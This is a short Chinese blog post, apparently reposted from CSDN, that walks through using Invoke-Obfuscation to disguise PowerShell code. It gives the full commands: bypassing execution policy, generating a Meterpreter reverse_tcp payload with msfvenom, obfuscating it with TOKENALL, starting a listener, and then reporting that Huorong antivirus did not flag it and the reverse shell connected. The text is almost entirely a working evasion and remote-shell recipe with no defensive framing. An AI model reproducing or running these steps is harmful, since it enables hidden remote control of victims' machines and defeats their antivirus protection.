目录
07powershell代码混淆
启动Invoke-Obfuscation
powershell -ep bypass
Import-Module ./Invoke-Obfuscation.psd1
Invoke-Obfuscation
启动成功
用msfvenom生成一个ps1文件
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.121 lport=4444 --arch x64 --platform wiindows -f psh-reflection -o 4444.ps1
启动完成过后,设置混淆脚本代码的位置
set scriptpath +文件位置
选择混淆方式为 TOKENALL
保存混淆之后的脚本 out out.ps1
msf监听
handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.121 -P 4444
运行混淆代码,火绒不报毒
执行混淆后的文件,反弹成功了,火绒没拦截
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/125924949